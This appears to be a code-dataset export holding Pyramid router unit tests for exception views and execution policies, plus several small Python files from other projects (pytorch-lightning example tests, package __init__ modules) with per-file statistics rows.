start_response = DummyStartResponse()
why = exc_raised(HTTPForbidden, router, environ, start_response)
self.assertTrue('from root factory' in why.args[0])
def test_root_factory_exception_propagating(self):
from pyramid.interfaces import IRootFactory
from zope.interface import Interface
from zope.interface import directlyProvides
def rootfactory(request):
raise RuntimeError()
self.registry.registerUtility(rootfactory, IRootFactory)
class IContext(Interface):
pass
context = DummyContext()
directlyProvides(context, IContext)
environ = self._makeEnviron()
router = self._makeOne()
start_response = DummyStartResponse()
self.assertRaises(RuntimeError, router, environ, start_response)
def test_traverser_exception_propagating(self):
environ = self._makeEnviron()
context = DummyContext()
self._registerTraverserFactory(context, raise_error=RuntimeError())
router = self._makeOne()
start_response = DummyStartResponse()
self.assertRaises(RuntimeError, router, environ, start_response)
def test_call_view_exception_propagating(self):
from zope.interface import Interface
from zope.interface import directlyProvides
class IContext(Interface):
pass
from pyramid.interfaces import IRequest
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IRequestFactory
from pyramid.interfaces import IExceptionViewClassifier
def rfactory(environ):
return request
self.registry.registerUtility(rfactory, IRequestFactory)
from pyramid.request import Request
request = Request.blank('/')
context = DummyContext()
directlyProvides(context, IContext)
self._registerTraverserFactory(context, subpath=[''])
response = DummyResponse()
response.app_iter = ['OK']
error = RuntimeError()
view = DummyView(response, raise_exception=error)
environ = self._makeEnviron()
def exception_view(context, request):
self.assertEqual(request.exc_info[0], RuntimeError)
return response
self._registerView(view, '', IViewClassifier, IRequest, IContext)
self._registerView(exception_view, '', IExceptionViewClassifier,
IRequest, RuntimeError)
router = self._makeOne()
start_response = DummyStartResponse()
result = router(environ, start_response)
self.assertEqual(result, ['OK'])
# exc_info and exception should still be around on the request after
# the excview tween has run (see
# https://github.com/Pylons/pyramid/issues/1223)
self.assertEqual(request.exception, error)
self.assertEqual(request.exc_info[:2], (RuntimeError, error,))
def test_call_view_raises_exception_view(self):
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IExceptionViewClassifier
from pyramid.interfaces import IRequest
response = DummyResponse()
exception_response = DummyResponse()
exception_response.app_iter = ["Hello, world"]
view = DummyView(response, raise_exception=RuntimeError)
def exception_view(context, request):
self.assertEqual(request.exception.__class__, RuntimeError)
return exception_response
environ = self._makeEnviron()
self._registerView(view, '', IViewClassifier, IRequest, None)
self._registerView(exception_view, '', IExceptionViewClassifier,
IRequest, RuntimeError)
router = self._makeOne()
start_response = DummyStartResponse()
result = router(environ, start_response)
self.assertEqual(result, ["Hello, world"])
def test_call_view_raises_super_exception_sub_exception_view(self):
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IExceptionViewClassifier
from pyramid.interfaces import IRequest
class SuperException(Exception):
pass
class SubException(SuperException):
pass
response = DummyResponse()
exception_response = DummyResponse()
exception_response.app_iter = ["Hello, world"]
view = DummyView(response, raise_exception=SuperException)
exception_view = DummyView(exception_response)
environ = self._makeEnviron()
self._registerView(view, '', IViewClassifier, IRequest, None)
self._registerView(exception_view, '', IExceptionViewClassifier,
IRequest, SubException)
router = self._makeOne()
start_response = DummyStartResponse()
self.assertRaises(SuperException, router, environ, start_response)
def test_call_view_raises_sub_exception_super_exception_view(self):
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IExceptionViewClassifier
from pyramid.interfaces import IRequest
class SuperException(Exception):
pass
class SubException(SuperException):
pass
response = DummyResponse()
exception_response = DummyResponse()
exception_response.app_iter = ["Hello, world"]
view = DummyView(response, raise_exception=SubException)
exception_view = DummyView(exception_response)
environ = self._makeEnviron()
self._registerView(view, '', IViewClassifier, IRequest, None)
self._registerView(exception_view, '', IExceptionViewClassifier,
IRequest, SuperException)
router = self._makeOne()
start_response = DummyStartResponse()
result = router(environ, start_response)
self.assertEqual(result, ["Hello, world"])
def test_call_view_raises_exception_another_exception_view(self):
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IExceptionViewClassifier
from pyramid.interfaces import IRequest
class MyException(Exception):
pass
class AnotherException(Exception):
pass
response = DummyResponse()
exception_response = DummyResponse()
exception_response.app_iter = ["Hello, world"]
view = DummyView(response, raise_exception=MyException)
exception_view = DummyView(exception_response)
environ = self._makeEnviron()
self._registerView(view, '', IViewClassifier, IRequest, None)
self._registerView(exception_view, '', IExceptionViewClassifier,
IRequest, AnotherException)
router = self._makeOne()
start_response = DummyStartResponse()
self.assertRaises(MyException, router, environ, start_response)
def test_root_factory_raises_exception_view(self):
from pyramid.interfaces import IRootFactory
from pyramid.interfaces import IRequest
from pyramid.interfaces import IExceptionViewClassifier
def rootfactory(request):
raise RuntimeError()
self.registry.registerUtility(rootfactory, IRootFactory)
exception_response = DummyResponse()
exception_response.app_iter = ["Hello, world"]
exception_view = DummyView(exception_response)
self._registerView(exception_view, '', IExceptionViewClassifier,
IRequest, RuntimeError)
environ = self._makeEnviron()
router = self._makeOne()
start_response = DummyStartResponse()
app_iter = router(environ, start_response)
self.assertEqual(app_iter, ["Hello, world"])
def test_traverser_raises_exception_view(self):
from pyramid.interfaces import IRequest
from pyramid.interfaces import IExceptionViewClassifier
environ = self._makeEnviron()
context = DummyContext()
self._registerTraverserFactory(context, raise_error=RuntimeError())
exception_response = DummyResponse()
exception_response.app_iter = ["Hello, world"]
exception_view = DummyView(exception_response)
self._registerView(exception_view, '', IExceptionViewClassifier,
IRequest, RuntimeError)
router = self._makeOne()
start_response = DummyStartResponse()
result = router(environ, start_response)
self.assertEqual(result, ["Hello, world"])
def test_exception_view_returns_non_iresponse(self):
from pyramid.interfaces import IRequest
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IExceptionViewClassifier
environ = self._makeEnviron()
response = DummyResponse()
view = DummyView(response, raise_exception=RuntimeError)
self._registerView(self.config.derive_view(view), '',
IViewClassifier, IRequest, None)
exception_view = DummyView(None)
self._registerView(self.config.derive_view(exception_view), '',
IExceptionViewClassifier,
IRequest, RuntimeError)
router = self._makeOne()
start_response = DummyStartResponse()
self.assertRaises(ValueError, router, environ, start_response)
def test_call_route_raises_route_exception_view(self):
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IExceptionViewClassifier
req_iface = self._registerRouteRequest('foo')
self._connectRoute('foo', 'archives/:action/:article', None)
view = DummyView(DummyResponse(), raise_exception=RuntimeError)
self._registerView(view, '', IViewClassifier, req_iface, None)
response = DummyResponse()
response.app_iter = ["Hello, world"]
exception_view = DummyView(response)
self._registerView(exception_view, '', IExceptionViewClassifier,
req_iface, RuntimeError)
environ = self._makeEnviron(PATH_INFO='/archives/action1/article1')
start_response = DummyStartResponse()
router = self._makeOne()
result = router(environ, start_response)
self.assertEqual(result, ["Hello, world"])
def test_call_view_raises_exception_route_view(self):
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IExceptionViewClassifier
from pyramid.interfaces import IRequest
req_iface = self._registerRouteRequest('foo')
self._connectRoute('foo', 'archives/:action/:article', None)
view = DummyView(DummyResponse(), raise_exception=RuntimeError)
self._registerView(view, '', IViewClassifier, IRequest, None)
response = DummyResponse()
response.app_iter = ["Hello, world"]
exception_view = DummyView(response)
self._registerView(exception_view, '', IExceptionViewClassifier,
req_iface, RuntimeError)
environ = self._makeEnviron()
start_response = DummyStartResponse()
router = self._makeOne()
self.assertRaises(RuntimeError, router, environ, start_response)
def test_call_route_raises_exception_view(self):
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IExceptionViewClassifier
from pyramid.interfaces import IRequest
req_iface = self._registerRouteRequest('foo')
self._connectRoute('foo', 'archives/:action/:article', None)
view = DummyView(DummyResponse(), raise_exception=RuntimeError)
self._registerView(view, '', IViewClassifier, req_iface, None)
response = DummyResponse()
response.app_iter = ["Hello, world"]
exception_view = DummyView(response)
self._registerView(exception_view, '', IExceptionViewClassifier,
IRequest, RuntimeError)
environ = self._makeEnviron(PATH_INFO='/archives/action1/article1')
start_response = DummyStartResponse()
router = self._makeOne()
result = router(environ, start_response)
self.assertEqual(result, ["Hello, world"])
def test_call_route_raises_super_exception_sub_exception_view(self):
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IExceptionViewClassifier
from pyramid.interfaces import IRequest
class SuperException(Exception):
pass
class SubException(SuperException):
pass
req_iface = self._registerRouteRequest('foo')
self._connectRoute('foo', 'archives/:action/:article', None)
view = DummyView(DummyResponse(), raise_exception=SuperException)
self._registerView(view, '', IViewClassifier, req_iface, None)
response = DummyResponse()
response.app_iter = ["Hello, world"]
exception_view = DummyView(response)
self._registerView(exception_view, '', IExceptionViewClassifier,
IRequest, SubException)
environ = self._makeEnviron(PATH_INFO='/archives/action1/article1')
start_response = DummyStartResponse()
router = self._makeOne()
self.assertRaises(SuperException, router, environ, start_response)
def test_call_route_raises_sub_exception_super_exception_view(self):
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IExceptionViewClassifier
from pyramid.interfaces import IRequest
class SuperException(Exception):
pass
class SubException(SuperException):
pass
req_iface = self._registerRouteRequest('foo')
self._connectRoute('foo', 'archives/:action/:article', None)
view = DummyView(DummyResponse(), raise_exception=SubException)
self._registerView(view, '', IViewClassifier, req_iface, None)
response = DummyResponse()
response.app_iter = ["Hello, world"]
exception_view = DummyView(response)
self._registerView(exception_view, '', IExceptionViewClassifier,
IRequest, SuperException)
environ = self._makeEnviron(PATH_INFO='/archives/action1/article1')
start_response = DummyStartResponse()
router = self._makeOne()
result = router(environ, start_response)
self.assertEqual(result, ["Hello, world"])
def test_call_route_raises_exception_another_exception_view(self):
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IExceptionViewClassifier
from pyramid.interfaces import IRequest
class MyException(Exception):
pass
class AnotherException(Exception):
pass
req_iface = self._registerRouteRequest('foo')
self._connectRoute('foo', 'archives/:action/:article', None)
view = DummyView(DummyResponse(), raise_exception=MyException)
self._registerView(view, '', IViewClassifier, req_iface, None)
response = DummyResponse()
response.app_iter = ["Hello, world"]
exception_view = DummyView(response)
self._registerView(exception_view, '', IExceptionViewClassifier,
IRequest, AnotherException)
environ = self._makeEnviron(PATH_INFO='/archives/action1/article1')
start_response = DummyStartResponse()
router = self._makeOne()
self.assertRaises(MyException, router, environ, start_response)
def test_call_route_raises_exception_view_specializing(self):
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IExceptionViewClassifier
from pyramid.interfaces import IRequest
req_iface = self._registerRouteRequest('foo')
self._connectRoute('foo', 'archives/:action/:article', None)
view = DummyView(DummyResponse(), raise_exception=RuntimeError)
self._registerView(view, '', IViewClassifier, req_iface, None)
response = DummyResponse()
response.app_iter = ["Hello, world"]
exception_view = DummyView(response)
self._registerView(exception_view, '', IExceptionViewClassifier,
IRequest, RuntimeError)
response_spec = DummyResponse()
response_spec.app_iter = ["Hello, special world"]
exception_view_spec = DummyView(response_spec)
self._registerView(exception_view_spec, '', IExceptionViewClassifier,
req_iface, RuntimeError)
environ = self._makeEnviron(PATH_INFO='/archives/action1/article1')
start_response = DummyStartResponse()
router = self._makeOne()
result = router(environ, start_response)
self.assertEqual(result, ["Hello, special world"])
def test_call_route_raises_exception_view_another_route(self):
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IExceptionViewClassifier
req_iface = self._registerRouteRequest('foo')
another_req_iface = self._registerRouteRequest('bar')
self._connectRoute('foo', 'archives/:action/:article', None)
view = DummyView(DummyResponse(), raise_exception=RuntimeError)
self._registerView(view, '', IViewClassifier, req_iface, None)
response = DummyResponse()
response.app_iter = ["Hello, world"]
exception_view = DummyView(response)
self._registerView(exception_view, '', IExceptionViewClassifier,
another_req_iface, RuntimeError)
environ = self._makeEnviron(PATH_INFO='/archives/action1/article1')
start_response = DummyStartResponse()
router = self._makeOne()
self.assertRaises(RuntimeError, router, environ, start_response)
def test_call_view_raises_exception_view_route(self):
from pyramid.interfaces import IRequest
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IExceptionViewClassifier
req_iface = self._registerRouteRequest('foo')
response = DummyResponse()
exception_response = DummyResponse()
exception_response.app_iter = ["Hello, world"]
view = DummyView(response, raise_exception=RuntimeError)
exception_view = DummyView(exception_response)
environ = self._makeEnviron()
self._registerView(view, '', IViewClassifier, IRequest, None)
self._registerView(exception_view, '', IExceptionViewClassifier,
req_iface, RuntimeError)
router = self._makeOne()
start_response = DummyStartResponse()
self.assertRaises(RuntimeError, router, environ, start_response)
def test_call_view_raises_predicate_mismatch(self):
from pyramid.exceptions import PredicateMismatch
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IRequest
view = DummyView(DummyResponse(), raise_exception=PredicateMismatch)
self._registerView(view, '', IViewClassifier, IRequest, None)
environ = self._makeEnviron()
router = self._makeOne()
start_response = DummyStartResponse()
self.assertRaises(PredicateMismatch, router, environ, start_response)
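# A PredicateMismatch from the most specific view should not end the lookup: the router is expected
# to fall back to views registered for base classes or base interfaces of the context before raising.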
def test_call_view_predicate_mismatch_doesnt_hide_views(self):
from pyramid.exceptions import PredicateMismatch
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IRequest, IResponse
from pyramid.response import Response
class BaseContext:
pass
class DummyContext(BaseContext):
pass
context = DummyContext()
self._registerTraverserFactory(context)
view = DummyView(DummyResponse(), raise_exception=PredicateMismatch)
self._registerView(view, '', IViewClassifier, IRequest,
DummyContext)
good_view = DummyView('abc')
self._registerView(self.config.derive_view(good_view),
'', IViewClassifier, IRequest, BaseContext)
router = self._makeOne()
def make_response(s):
return Response(s)
router.registry.registerAdapter(make_response, (str,), IResponse)
environ = self._makeEnviron()
start_response = DummyStartResponse()
app_iter = router(environ, start_response)
self.assertEqual(app_iter, [b'abc'])
def test_call_view_multiple_predicate_mismatches_dont_hide_views(self):
from pyramid.exceptions import PredicateMismatch
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IRequest, IResponse
from pyramid.response import Response
from zope.interface import Interface, implementer
class IBaseContext(Interface):
pass
class IContext(IBaseContext):
pass
@implementer(IContext)
class DummyContext:
pass
context = DummyContext()
self._registerTraverserFactory(context)
view1 = DummyView(DummyResponse(), raise_exception=PredicateMismatch)
self._registerView(view1, '', IViewClassifier, IRequest,
DummyContext)
view2 = DummyView(DummyResponse(), raise_exception=PredicateMismatch)
self._registerView(view2, '', IViewClassifier, IRequest,
IContext)
good_view = DummyView('abc')
self._registerView(self.config.derive_view(good_view),
'', IViewClassifier, IRequest, IBaseContext)
router = self._makeOne()
def make_response(s):
return Response(s)
router.registry.registerAdapter(make_response, (str,), IResponse)
environ = self._makeEnviron()
start_response = DummyStartResponse()
app_iter = router(environ, start_response)
self.assertEqual(app_iter, [b'abc'])
def test_call_view_predicate_mismatch_doesnt_find_unrelated_views(self):
from pyramid.exceptions import PredicateMismatch
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IRequest
from zope.interface import Interface, implementer
class IContext(Interface):
pass
class IOtherContext(Interface):
pass
@implementer(IContext)
class DummyContext:
pass
context = DummyContext()
self._registerTraverserFactory(context)
view = DummyView(DummyResponse(), raise_exception=PredicateMismatch)
self._registerView(view, '', IViewClassifier, IRequest,
DummyContext)
please_dont_call_me_view = DummyView('abc')
self._registerView(self.config.derive_view(please_dont_call_me_view),
'', IViewClassifier, IRequest, IOtherContext)
router = self._makeOne()
environ = self._makeEnviron()
router = self._makeOne()
start_response = DummyStartResponse()
self.assertRaises(PredicateMismatch, router, environ, start_response)
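# The execution policy is the outermost hook: the router hands the raw environ to it, so a custom
# policy can short-circuit normal request handling and return any response it likes.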
def test_custom_execution_policy(self):
from pyramid.interfaces import IExecutionPolicy
from pyramid.request import Request
from pyramid.response import Response
registry = self.config.registry
def dummy_policy(environ, router):
return Response(status=200, body=b'foo')
registry.registerUtility(dummy_policy, IExecutionPolicy)
router = self._makeOne()
resp = Request.blank('/').get_response(router)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.body, b'foo')
def test_execution_policy_handles_exception(self):
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IExceptionViewClassifier
from pyramid.interfaces import IRequest
class Exception1(Exception):
pass
class Exception2(Exception):
pass
req_iface = self._registerRouteRequest('foo')
self._connectRoute('foo', 'archives/:action/:article', None)
view = DummyView(DummyResponse(), raise_exception=Exception1)
self._registerView(view, '', IViewClassifier, req_iface, None)
exception_view1 = DummyView(DummyResponse(),
raise_exception=Exception2)
self._registerView(exception_view1, '', IExceptionViewClassifier,
IRequest, Exception1)
response = DummyResponse()
response.app_iter = ["Hello, world"]
exception_view2 = DummyView(response)
self._registerView(exception_view2, '', IExceptionViewClassifier,
IRequest, Exception2)
environ = self._makeEnviron(PATH_INFO='/archives/action1/article1')
start_response = DummyStartResponse()
router = self._makeOne()
result = router(environ, start_response)
self.assertEqual(result, ["Hello, world"])
def test_request_context_with_statement(self):
from pyramid.threadlocal import get_current_request
from pyramid.interfaces import IExecutionPolicy
from pyramid.request import Request
from pyramid.response import Response
registry = self.config.registry
result = []
def dummy_policy(environ, router):
with router.request_context(environ):
result.append(get_current_request())
result.append(get_current_request())
return Response(status=200, body=b'foo')
registry.registerUtility(dummy_policy, IExecutionPolicy)
router = self._makeOne()
resp = Request.blank('/test_path').get_response(router)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.body, b'foo')
self.assertEqual(result[0].path_info, '/test_path')
self.assertEqual(result[1], None)
def test_request_context_manually(self):
from pyramid.threadlocal import get_current_request
from pyramid.interfaces import IExecutionPolicy
from pyramid.request import Request
from pyramid.response import Response
registry = self.config.registry
result = []
def dummy_policy(environ, router):
ctx = router.request_context(environ)
ctx.begin()
result.append(get_current_request())
ctx.end()
result.append(get_current_request())
return Response(status=200, body=b'foo')
registry.registerUtility(dummy_policy, IExecutionPolicy)
router = self._makeOne()
resp = Request.blank('/test_path').get_response(router)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.body, b'foo')
self.assertEqual(result[0].path_info, '/test_path')
self.assertEqual(result[1], None)
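# Test doubles shared by the router tests above.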
class DummyPredicate(object):
    def __call__(self, info, request):
        return True
    def text(self):
        return 'predicate'
class DummyContext:
    pass
class DummyView:
    def __init__(self, response, raise_exception=None):
        self.response = response
        self.raise_exception = raise_exception
    def __call__(self, context, request):
        self.context = context
        self.request = request
        if self.raise_exception is not None:
            raise self.raise_exception
        return self.response
class DummyRootFactory:
    def __init__(self, root):
        self.root = root
    def __call__(self, environ):
        return self.root
class DummyStartResponse:
    status = ()
    headers = ()
    def __call__(self, status, headers):
        self.status = status
        self.headers = headers
from pyramid.interfaces import IResponse
from zope.interface import implementer
@implementer(IResponse)
class DummyResponse(object):
    headerlist = ()
    app_iter = ()
    environ = None
    def __init__(self, status='200 OK'):
        self.status = status
    def __call__(self, environ, start_response):
        self.environ = environ
        start_response(self.status, self.headerlist)
        return self.app_iter
class DummyAuthenticationPolicy:
    pass
class DummyLogger:
    def __init__(self):
        self.messages = []
    def info(self, msg):
        self.messages.append(msg)
    warn = info
    debug = info
def exc_raised(exc, func, *arg, **kw):
    try:
        func(*arg, **kw)
    except exc as e:
        return e
    else:
        raise AssertionError('%s not raised' % exc) # pragma: no cover
| 44.212615 | 80 | 0.66578 | 5,776 | 62,384 | 6.990824 | 0.059037 | 0.041135 | 0.058768 | 0.075559 | 0.815721 | 0.776319 | 0.750737 | 0.719161 | 0.69759 | 0.683846 | 0 | 0.003464 | 0.250273 | 62,384 | 1,410 | 81 | 44.243972 | 0.85987 | 0.003623 | 0 | 0.70687 | 0 | 0 | 0.036121 | 0.009445 | 0 | 0 | 0 | 0 | 0.110687 | 1 | 0.092366 | false | 0.029771 | 0.138168 | 0.00916 | 0.299237 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
60a98ad188a68f01ec581e6c0e915babfcba0adf | 131 | py | Python | satdetect/ioutil/__init__.py | michaelchughes/satdetect | 23319fd1c6bd7d36709b5948584efcc723c428c1 | [
"MIT"
] | 3 | 2016-03-15T17:27:31.000Z | 2019-02-25T16:46:05.000Z | satdetect/ioutil/__init__.py | michaelchughes/satdetect | 23319fd1c6bd7d36709b5948584efcc723c428c1 | [
"MIT"
] | 1 | 2018-05-24T21:57:08.000Z | 2018-05-24T21:57:08.000Z | satdetect/ioutil/__init__.py | michaelchughes/satdetect | 23319fd1c6bd7d36709b5948584efcc723c428c1 | [
"MIT"
] | 2 | 2016-07-08T10:14:59.000Z | 2019-02-25T16:46:08.000Z | from IOUtil import imgpath2list, getFilepathParts, loadImage, mkpath
__all__ = [imgpath2list, getFilepathParts, loadImage, mkpath] | 43.666667 | 68 | 0.832061 | 12 | 131 | 8.75 | 0.666667 | 0.533333 | 0.704762 | 0.819048 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016949 | 0.099237 | 131 | 3 | 69 | 43.666667 | 0.872881 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
60f10a637e583b97d4873a96b2f110f604401415 | 3,855 | py | Python | pl_examples/test_examples.py | Palzer/pytorch-lightning | 886702a1af442f33625693a9ba33c669f9fe9535 | [
"Apache-2.0"
] | null | null | null | pl_examples/test_examples.py | Palzer/pytorch-lightning | 886702a1af442f33625693a9ba33c669f9fe9535 | [
"Apache-2.0"
] | 1 | 2021-01-20T09:05:55.000Z | 2021-01-20T09:05:55.000Z | pl_examples/test_examples.py | zippeurfou/pytorch-lightning | 4018237c309b7d9d6978da73132003615341e04a | [
"Apache-2.0"
] | null | null | null | import platform
from unittest import mock
import pytest
import torch
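# nvidia-dali is an optional dependency; DALI_AVAILABLE below gates the GPU-only DALI test at the
# bottom of this module.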
try:
    from nvidia.dali import ops, types, pipeline, plugin
except (ImportError, ModuleNotFoundError):
    DALI_AVAILABLE = False
else:
    DALI_AVAILABLE = True
dp_16_args = """
--max_epochs 1 \
--batch_size 32 \
--limit_train_batches 2 \
--limit_val_batches 2 \
--gpus 2 \
--distributed_backend dp \
--precision 16 \
"""
cpu_args = """
--max_epochs 1 \
--batch_size 32 \
--limit_train_batches 2 \
--limit_val_batches 2 \
"""
ddp_args = """
--max_epochs 1 \
--batch_size 32 \
--limit_train_batches 2 \
--limit_val_batches 2 \
--gpus 2 \
--precision 16 \
"""
# TODO
# @pytest.mark.skipif(torch.cuda.device_count() < 2, reason="test requires multi-GPU machine")
# @pytest.mark.parametrize('cli_args', [dp_16_args])
# def test_examples_dp_mnist(cli_args):
# from pl_examples.basic_examples.mnist import cli_main
#
# with mock.patch("argparse._sys.argv", ["any.py"] + cli_args.strip().split()):
# cli_main()
# TODO
# @pytest.mark.skipif(torch.cuda.device_count() < 2, reason="test requires multi-GPU machine")
# @pytest.mark.parametrize('cli_args', [dp_16_args])
# def test_examples_dp_image_classifier(cli_args):
# from pl_examples.basic_examples.image_classifier import cli_main
#
# with mock.patch("argparse._sys.argv", ["any.py"] + cli_args.strip().split()):
# cli_main()
# TODO
# @pytest.mark.skipif(torch.cuda.device_count() < 2, reason="test requires multi-GPU machine")
# @pytest.mark.parametrize('cli_args', [dp_16_args])
# def test_examples_dp_autoencoder(cli_args):
# from pl_examples.basic_examples.autoencoder import cli_main
#
# with mock.patch("argparse._sys.argv", ["any.py"] + cli_args.strip().split()):
# cli_main()
# TODO
# @pytest.mark.skipif(torch.cuda.device_count() < 2, reason="test requires multi-GPU machine")
# @pytest.mark.parametrize('cli_args', [ddp_args])
# def test_examples_ddp_mnist(cli_args):
# from pl_examples.basic_examples.mnist import cli_main
#
# with mock.patch("argparse._sys.argv", ["any.py"] + cli_args.strip().split()):
# cli_main()
# TODO
# @pytest.mark.skipif(torch.cuda.device_count() < 2, reason="test requires multi-GPU machine")
# @pytest.mark.parametrize('cli_args', [ddp_args])
# def test_examples_ddp_image_classifier(cli_args):
# from pl_examples.basic_examples.image_classifier import cli_main
#
# with mock.patch("argparse._sys.argv", ["any.py"] + cli_args.strip().split()):
# cli_main()
# TODO
# @pytest.mark.skipif(torch.cuda.device_count() < 2, reason="test requires multi-GPU machine")
# @pytest.mark.parametrize('cli_args', [ddp_args])
# def test_examples_ddp_autoencoder(cli_args):
# from pl_examples.basic_examples.autoencoder import cli_main
#
# with mock.patch("argparse._sys.argv", ["any.py"] + cli_args.strip().split()):
# cli_main()
#
@pytest.mark.parametrize('cli_args', [cpu_args])
def test_examples_cpu(cli_args):
    from pl_examples.basic_examples.mnist import cli_main as mnist_cli
    from pl_examples.basic_examples.image_classifier import cli_main as ic_cli
    from pl_examples.basic_examples.autoencoder import cli_main as ae_cli
    for cli_cmd in [mnist_cli, ic_cli, ae_cli]:
        with mock.patch("argparse._sys.argv", ["any.py"] + cli_args.strip().split()):
            cli_cmd()
@pytest.mark.skipif(not DALI_AVAILABLE, reason="Nvidia DALI required")
@pytest.mark.skipif(not torch.cuda.is_available(), reason="test requires GPU machine")
@pytest.mark.skipif(platform.system() != 'Linux', reason='Only applies to Linux platform.')
@pytest.mark.parametrize('cli_args', [cpu_args])
def test_examples_mnist_dali(cli_args):
    from pl_examples.basic_examples.mnist_dali import cli_main
    with mock.patch("argparse._sys.argv", ["any.py"] + cli_args.strip().split()):
        cli_main()
| 32.125 | 94 | 0.715953 | 555 | 3,855 | 4.702703 | 0.156757 | 0.064368 | 0.05364 | 0.072797 | 0.81341 | 0.81341 | 0.811111 | 0.811111 | 0.796169 | 0.776628 | 0 | 0.010495 | 0.13489 | 3,855 | 119 | 95 | 32.394958 | 0.772114 | 0.555123 | 0 | 0.469388 | 0 | 0 | 0.291892 | 0.05045 | 0 | 0 | 0 | 0.008403 | 0 | 1 | 0.040816 | false | 0 | 0.204082 | 0 | 0.244898 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
60fcac8c565f52772e31b0515722896754228d53 | 131 | py | Python | src/test/test_model/test_neurons/__init__.py | Fassial/pku-intern | 4463e7d5a5844c8002f7e3d01b4fadc3a20e2038 | [
"MIT"
] | null | null | null | src/test/test_model/test_neurons/__init__.py | Fassial/pku-intern | 4463e7d5a5844c8002f7e3d01b4fadc3a20e2038 | [
"MIT"
] | null | null | null | src/test/test_model/test_neurons/__init__.py | Fassial/pku-intern | 4463e7d5a5844c8002f7e3d01b4fadc3a20e2038 | [
"MIT"
] | null | null | null | """
Created on 12:13, May. 23rd, 2021
Author: fassial
Filename: __init__.py
"""
# test_neurons model
from .test_neurons import *
| 13.1 | 33 | 0.717557 | 19 | 131 | 4.631579 | 0.894737 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 0.160305 | 131 | 9 | 34 | 14.555556 | 0.709091 | 0.694656 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
714f8a8d7e5693da634704e423d7dee3ad4c692f | 168 | py | Python | tonic/replays/__init__.py | Eyalcohenx/tonic | afc15c6fa23fed4f696f68f0acf961964b0172dc | [
"MIT"
] | 350 | 2020-08-06T13:49:11.000Z | 2022-03-24T08:53:59.000Z | tonic/replays/__init__.py | Eyalcohenx/tonic | afc15c6fa23fed4f696f68f0acf961964b0172dc | [
"MIT"
] | 12 | 2020-08-07T02:21:58.000Z | 2021-05-20T11:50:44.000Z | tonic/replays/__init__.py | Eyalcohenx/tonic | afc15c6fa23fed4f696f68f0acf961964b0172dc | [
"MIT"
] | 35 | 2020-08-06T16:53:40.000Z | 2021-12-17T06:01:09.000Z | from .buffers import Buffer
from .segments import Segment
from .utils import flatten_batch, lambda_returns
__all__ = ['flatten_batch', 'lambda_returns', 'Buffer', 'Segment']
| 24 | 58 | 0.815476 | 22 | 168 | 5.863636 | 0.545455 | 0.186047 | 0.27907 | 0.387597 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 168 | 6 | 59 | 28 | 0.877551 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.75 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
7151e1a6be4abb6476e27e48f9a4112280588d02 | 65 | py | Python | steam/enums/base.py | tjensen/steam | 061ca33842c9ec5aa7c0866d20cbeed0759d5ea5 | [
"MIT"
